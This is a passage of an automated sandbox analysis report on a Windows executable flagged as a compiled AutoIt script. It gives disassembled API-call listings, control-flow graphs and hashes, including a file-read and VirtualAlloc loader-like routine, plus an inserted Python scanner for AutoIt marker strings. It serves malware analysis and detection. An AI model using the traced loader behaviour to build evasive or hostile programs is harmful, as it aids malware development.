• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EF5F6A
• __dosmaperr.LIBCMT ref: 00EF5F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF5F7C
• __set_osfhnd.LIBCMT ref: 00EF5FAC
• __lseeki64_nolock.LIBCMT ref: 00EF6016
• __close_nolock.LIBCMT ref: 00EF603C
• __chsize_nolock.LIBCMT ref: 00EF606C
• __lseeki64_nolock.LIBCMT ref: 00EF607E
• __lseeki64_nolock.LIBCMT ref: 00EF6176
• __lseeki64_nolock.LIBCMT ref: 00EF618B
• __close_nolock.LIBCMT ref: 00EF61EB
  • Part of subcall function 00EEEA9C: CloseHandle.KERNELBASE(00000000,00F6EEF4,00000000,?,00EF6041,00F6EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EEEAEC
  • Part of subcall function 00EEEA9C: GetLastError.KERNEL32(?,00EF6041,00F6EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EEEAF6
  • Part of subcall function 00EEEA9C: __free_osfhnd.LIBCMT ref: 00EEEB03
  • Part of subcall function 00EEEA9C: __dosmaperr.LIBCMT ref: 00EEEB25
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
• __lseeki64_nolock.LIBCMT ref: 00EF620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF6342
• ___createFile.LIBCMT ref: 00EF6361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EF636E
• __dosmaperr.LIBCMT ref: 00EF6375
• __free_osfhnd.LIBCMT ref: 00EF6395
• __invoke_watson.LIBCMT ref: 00EF63C3
• __wsopen_helper.LIBCMT ref: 00EF63DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 4fbff0f0732d98f5377d3aef14083695fa195fd7126d7411b4da3acc72daf93e
                                                                                                                                                                                                                                                      • Instruction ID: 60a7c7a23d6f196f7bb325f678d0d2bd45652447cc03f08dfd174abacd868421
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fbff0f0732d98f5377d3aef14083695fa195fd7126d7411b4da3acc72daf93e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A223872A0050E9BEF299F68DC45BFE7B61EB21318F246229E711B72E1C7358D40D751
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __getptd_noexit
• String ID:
• API String ID: 3074181302-0
• Opcode ID: a7acace79b6f385ff8b3f3f96c58d36b379123a6a9801c54ea413c6b73117e7b
• Instruction ID: 3dc82ac6e15c285aebd5615bd43d6bf99fdad57b77205785a1b3dd6335c9909c
• Opcode Fuzzy Hash: a7acace79b6f385ff8b3f3f96c58d36b379123a6a9801c54ea413c6b73117e7b
• Instruction Fuzzy Hash: 9B321470A042CDDFDB218F69D840BBD7BB1AF56318F2460AAE895BB392D7309C45C761

Control-flow Graph
APIs
• _wcscpy.LIBCMT ref: 00F0FA96
• _wcschr.LIBCMT ref: 00F0FAA4
• _wcscpy.LIBCMT ref: 00F0FABB
• _wcscat.LIBCMT ref: 00F0FACA
• _wcscat.LIBCMT ref: 00F0FAE8
• _wcscpy.LIBCMT ref: 00F0FB09
• __wsplitpath.LIBCMT ref: 00F0FBE6
• _wcscpy.LIBCMT ref: 00F0FC0B
• _wcscpy.LIBCMT ref: 00F0FC1D
• _wcscpy.LIBCMT ref: 00F0FC32
• _wcscat.LIBCMT ref: 00F0FC47
• _wcscat.LIBCMT ref: 00F0FC59
• _wcscat.LIBCMT ref: 00F0FC6E
  • Part of subcall function 00F0BFA4: _wcscmp.LIBCMT ref: 00F0C03E
  • Part of subcall function 00F0BFA4: __wsplitpath.LIBCMT ref: 00F0C083
  • Part of subcall function 00F0BFA4: _wcscpy.LIBCMT ref: 00F0C096
  • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0A9
  • Part of subcall function 00F0BFA4: __wsplitpath.LIBCMT ref: 00F0C0CE
  • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0E4
  • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
• Opcode ID: 716f909a8bf83146a96e771921b87224a70330e9cec88546aa8dc17e60972be7
• Instruction ID: 4b2f47294ddf189edc87c88419825b73136bc9ddf7e1b250e46d059b62ce0d4e
• Opcode Fuzzy Hash: 716f909a8bf83146a96e771921b87224a70330e9cec88546aa8dc17e60972be7
• Instruction Fuzzy Hash: D691C172504345AFDB20EB54C951F9EB3E8FF84310F04886DF949A7292DB35EA48DB92

Control-flow Graph
APIs
• GetSysColorBrush.USER32(0000000F), ref: 00EC3F86
• RegisterClassExW.USER32(00000030), ref: 00EC3FB0
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC3FC1
• InitCommonControlsEx.COMCTL32(?), ref: 00EC3FDE
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC3FEE
• LoadIconW.USER32(000000A9), ref: 00EC4004
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC4013
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 9b11460e1a49b7692f895497081391dcb3d0aec4374c3d06fe3c65d079386bb1
• Instruction ID: 3be82b36288c53685c9f99b7aae6fc2d517030f94ca75a4b638dc98fe5a3edb2
• Opcode Fuzzy Hash: 9b11460e1a49b7692f895497081391dcb3d0aec4374c3d06fe3c65d079386bb1
• Instruction Fuzzy Hash: 4221E5B590121CAFDB40DFA4EC89BDDBBB8FB19700F00421AFA11A62A0E7B54545AF91
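The two functions above reference the strings ">>>AUTOIT SCRIPT<<<" (in the wcscpy/wcscat/__wsplitpath path-building routine) and "AutoIt v3 GUI" (in the routine that calls RegisterClassExW and registers the TaskbarCreated message), which is the evidence behind the report's compiled-AutoIt verdict. As an added example, not code from the Joe Sandbox report or from the AutoIt project, the following Python scans a file image for both strings in ASCII and UTF-16LE and returns every hit with its offset; the function names, the verdict rule (MZ header present and script marker found) and the sample byte buffer are this example's own constructions, and the choice to treat the window-class string as supporting rather than sufficient evidence is a design assumption of the example.

```python
"""Locate compiled-AutoIt marker strings in a file image.

Added example (not from the Joe Sandbox report or AutoIt itself). The
two markers come from the String IDs shown in the report; the search
covers ASCII and UTF-16LE because the referencing code is wide-char
(wcscpy/wcscat, RegisterClassExW). The sample buffer is constructed.
"""

from typing import Dict, List, Tuple

# Marker strings as they appear in the report's String IDs.
MARKERS: Dict[str, str] = {
    "script_marker": ">>>AUTOIT SCRIPT<<<",  # script-resource marker
    "gui_class": "AutoIt v3 GUI",            # window class name
}

Hit = Tuple[str, str, int]  # (marker name, encoding, byte offset)


def _needles(text: str) -> Dict[str, bytes]:
    """Byte patterns for one marker in each encoding we search."""
    return {"ascii": text.encode("ascii"), "utf-16le": text.encode("utf-16-le")}


def find_autoit_markers(data: bytes) -> List[Hit]:
    """Return every marker occurrence in `data`, sorted by offset.

    Overlapping and repeated occurrences are all reported, so a sample
    that embeds the marker several times (e.g. stub plus payload) shows
    each location.
    """
    hits: List[Hit] = []
    for name, text in MARKERS.items():
        for enc, needle in _needles(text).items():
            start = 0
            while True:
                idx = data.find(needle, start)
                if idx < 0:
                    break
                hits.append((name, enc, idx))
                start = idx + 1
    return sorted(hits, key=lambda h: h[2])


def is_compiled_autoit(data: bytes) -> bool:
    """Verdict used by this example (assumption, not the sandbox's rule):

    a PE image (MZ header) that carries the script marker. The GUI class
    string alone is not enough here, since it only shows the AutoIt
    runtime is present, not that a script is embedded.
    """
    names = {h[0] for h in find_autoit_markers(data)}
    return data[:2] == b"MZ" and "script_marker" in names


def scan_file(path: str) -> List[Hit]:
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as f:
        return find_autoit_markers(f.read())


# Constructed sample: fake MZ header, padding, then both markers as UTF-16LE.
# Layout: 2 + 62 + 32 = 96 -> script marker (38 bytes) -> 134 + 16 = 150 -> GUI class.
SAMPLE: bytes = (
    b"MZ" + b"\x00" * 62
    + b"\x90" * 32
    + MARKERS["script_marker"].encode("utf-16-le")
    + b"\x00" * 16
    + MARKERS["gui_class"].encode("utf-16-le")
)

if __name__ == "__main__":
    for name, enc, off in find_autoit_markers(SAMPLE):
        print(f"{name:14s} {enc:9s} @ 0x{off:08x}")
    print("compiled AutoIt:", is_compiled_autoit(SAMPLE))
```

Run it against a real sample with `scan_file(path)`; a hit on the script marker in a PE is the same signal the report records under "Binary is likely a compiled AutoIt script file", while the window-class string alone only tells you the AutoIt runtime is linked in.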

Control-flow Graph
control_flow_graph (function 00F0BFA4, basic blocks f0bfa4 to f0c393; rendered graph with executed/not-executed colouring not reproduced). Win32 calls in the graph: DeleteFileW at f0c29a, f0c331, f0c358 and f0c36a; CopyFileW at f0c342.
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BDB4: __time64.LIBCMT ref: 00F0BDBE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4517: _fseek.LIBCMT ref: 00EC452F
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0C083
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0C096
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0A9
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0C0CE
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0E4
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0F7
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C03E
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C65D
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C670
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F0C2A1
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F0C338
                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F0C34E
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F0C35F
                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F0C371
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2378138488-0
                                                                                                                                                                                                                                                      • Opcode ID: 4c93893382cd34d45ddf6171bc2a9221cdbcc11b377e97819a2a68746146ea6a
                                                                                                                                                                                                                                                      • Instruction ID: 6267dca77942f8a05f10697198c873a3584ab7b42bc6f2adc10d92a765a8ed5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c93893382cd34d45ddf6171bc2a9221cdbcc11b377e97819a2a68746146ea6a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52C13CB1D00219ABDF11DF95CC81EDEB7BCAF49310F1041AAF609E6191DB709A84AF61

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      Control-flow graph of the function at 00EC3742 (rendered graph omitted; blocks are marked Executed or Not Executed in the report)
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00EC37B3
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00EC37DD
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC3800
                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC380B
                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00EC381F
                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00EC382E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                      • Opcode ID: b77553d84b69a4b96309e4d153b544512de574e0272bb5a42296837256cf30f1
                                                                                                                                                                                                                                                      • Instruction ID: c83e3963b667603d9a496d4f344f8c477dddcc4f3bdae6b711408277bb453340
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b77553d84b69a4b96309e4d153b544512de574e0272bb5a42296837256cf30f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D4148F920014DA7DB146B389E4AFFB3699FB04310F00A21EF902F6191CB629D53B761

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC3E79
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00EC3E88
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EC3E9E
                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00EC3EB0
                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00EC3EC2
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4024: LoadImageW.USER32(00EC0000,00000063,00000001,00000010,00000010,00000000), ref: 00EC4048
                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00EC3F30
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: GetSysColorBrush.USER32(0000000F), ref: 00EC3F86
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: RegisterClassExW.USER32(00000030), ref: 00EC3FB0
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC3FC1
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: InitCommonControlsEx.COMCTL32(?), ref: 00EC3FDE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC3FEE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: LoadIconW.USER32(000000A9), ref: 00EC4004
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC4013
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 9db8bc44b2b430c37cfd02a312b7a15f26292a8de2e59c710e824538cc03efa0
• Instruction ID: 99544e85382f1c1853b5ca5b97cf306f8f0ace2a000af5561e84d430521fbb00
• Opcode Fuzzy Hash: 9db8bc44b2b430c37cfd02a312b7a15f26292a8de2e59c710e824538cc03efa0
• Instruction Fuzzy Hash: 432151B4D00308ABDB10DFA9EC49AE9BFF9FB48710F00521AE605A22A0D3754641AF91

Control-flow Graph

control_flow_graph 1234 eeacb3-eeace0 call ee6ac0 call ee7cf4 call ee6986 1241 eeacfd-eead02 1234->1241 1242 eeace2-eeacf8 call eee880 1234->1242 1243 eead08-eead0f 1241->1243 1248 eeaf52-eeaf57 call ee6b05 1242->1248 1245 eead42-eead51 GetStartupInfoW 1243->1245 1246 eead11-eead40 1243->1246 1249 eead57-eead5c 1245->1249 1250 eeae80-eeae86 1245->1250 1246->1243 1249->1250 1252 eead62-eead79 1249->1252 1253 eeae8c-eeae9d 1250->1253 1254 eeaf44-eeaf50 call eeaf58 1250->1254 1256 eead7b-eead7d 1252->1256 1257 eead80-eead83 1252->1257 1258 eeae9f-eeaea2 1253->1258 1259 eeaeb2-eeaeb8 1253->1259 1254->1248 1256->1257 1264 eead86-eead8c 1257->1264 1258->1259 1265 eeaea4-eeaead 1258->1265 1261 eeaebf-eeaec6 1259->1261 1262 eeaeba-eeaebd 1259->1262 1266 eeaec9-eeaed5 GetStdHandle 1261->1266 1262->1266 1267 eeadae-eeadb6 1264->1267 1268 eead8e-eead9f call ee6986 1264->1268 1269 eeaf3e-eeaf3f 1265->1269 1270 eeaf1c-eeaf32 1266->1270 1271 eeaed7-eeaed9 1266->1271 1273 eeadb9-eeadbb 1267->1273 1281 eeada5-eeadab 1268->1281 1282 eeae33-eeae3a 1268->1282 1269->1250 1270->1269 1276 eeaf34-eeaf37 1270->1276 1271->1270 1274 eeaedb-eeaee4 GetFileType 1271->1274 1273->1250 1277 eeadc1-eeadc6 1273->1277 1274->1270 1280 eeaee6-eeaef0 1274->1280 1276->1269 1278 eeadc8-eeadcb 1277->1278 1279 eeae20-eeae31 1277->1279 1278->1279 1283 eeadcd-eeadd1 1278->1283 1279->1273 1284 eeaefa-eeaefd 1280->1284 1285 eeaef2-eeaef8 1280->1285 1281->1267 1286 eeae40-eeae4e 1282->1286 1283->1279 1287 eeadd3-eeadd5 1283->1287 1289 eeaeff-eeaf03 1284->1289 1290 eeaf08-eeaf1a InitializeCriticalSectionAndSpinCount 1284->1290 1288 eeaf05 1285->1288 1291 eeae74-eeae7b 1286->1291 1292 eeae50-eeae72 1286->1292 1293 eeadd7-eeade3 GetFileType 1287->1293 1294 eeade5-eeae1a InitializeCriticalSectionAndSpinCount 1287->1294 1288->1290 1289->1288 1290->1269 1291->1264 1292->1286 1293->1294 1295 eeae1d 1293->1295 1294->1295 1295->1279
APIs
• __lock.LIBCMT ref: 00EEACC1
  • Part of subcall function 00EE7CF4: __mtinitlocknum.LIBCMT ref: 00EE7D06
  • Part of subcall function 00EE7CF4: EnterCriticalSection.KERNEL32(00000000,?,00EE7ADD,0000000D), ref: 00EE7D1F
• __calloc_crt.LIBCMT ref: 00EEACD2
  • Part of subcall function 00EE6986: __calloc_impl.LIBCMT ref: 00EE6995
  • Part of subcall function 00EE6986: Sleep.KERNEL32(00000000,000003BC,00EDF507,?,0000000E), ref: 00EE69AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00EEACED
• GetStartupInfoW.KERNEL32(?,00F76E28,00000064,00EE5E91,00F76C70,00000014), ref: 00EEAD46
• __calloc_crt.LIBCMT ref: 00EEAD91
• GetFileType.KERNEL32(00000001), ref: 00EEADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00EEAE11
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: c8143887be4cb337469dac352309ac8b1dc58a14cd46525a29859213049f5d8f
• Instruction ID: aff07e44610c29b16572af9e3147a61240b5170fbb1621e531ed45980e8f0a02
• Opcode Fuzzy Hash: c8143887be4cb337469dac352309ac8b1dc58a14cd46525a29859213049f5d8f
• Instruction Fuzzy Hash: E181177190178D8FDB24CF69C8805ADBBF0AF15324B28526DD4A6BB3E1C734A843DB52

Control-flow Graph

control_flow_graph 1296 116de30-116dede call 116b830 1299 116dee5-116df0b call 116ed40 CreateFileW 1296->1299 1302 116df12-116df22 1299->1302 1303 116df0d 1299->1303 1308 116df24 1302->1308 1309 116df29-116df43 VirtualAlloc 1302->1309 1304 116e05d-116e061 1303->1304 1306 116e0a3-116e0a6 1304->1306 1307 116e063-116e067 1304->1307 1310 116e0a9-116e0b0 1306->1310 1311 116e073-116e077 1307->1311 1312 116e069-116e06c 1307->1312 1308->1304 1315 116df45 1309->1315 1316 116df4a-116df61 ReadFile 1309->1316 1317 116e105-116e11a 1310->1317 1318 116e0b2-116e0bd 1310->1318 1313 116e087-116e08b 1311->1313 1314 116e079-116e083 1311->1314 1312->1311 1321 116e08d-116e097 1313->1321 1322 116e09b 1313->1322 1314->1313 1315->1304 1323 116df63 1316->1323 1324 116df68-116dfa8 VirtualAlloc 1316->1324 1319 116e11c-116e127 VirtualFree 1317->1319 1320 116e12a-116e132 1317->1320 1325 116e0c1-116e0cd 1318->1325 1326 116e0bf 1318->1326 1319->1320 1321->1322 1322->1306 1323->1304 1327 116dfaf-116dfca call 116ef90 1324->1327 1328 116dfaa 1324->1328 1329 116e0e1-116e0ed 1325->1329 1330 116e0cf-116e0df 1325->1330 1326->1317 1336 116dfd5-116dfdf 1327->1336 1328->1304 1331 116e0ef-116e0f8 1329->1331 1332 116e0fa-116e100 1329->1332 1334 116e103 1330->1334 1331->1334 1332->1334 1334->1310 1337 116e012-116e026 call 116eda0 1336->1337 1338 116dfe1-116e010 call 116ef90 1336->1338 1344 116e02a-116e02e 1337->1344 1345 116e028 1337->1345 1338->1336 1346 116e030-116e034 CloseHandle 1344->1346 1347 116e03a-116e03e 1344->1347 1345->1304 1346->1347 1348 116e040-116e04b VirtualFree 1347->1348 1349 116e04e-116e057 1347->1349 1348->1349 1349->1299 1349->1304
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0116DF01
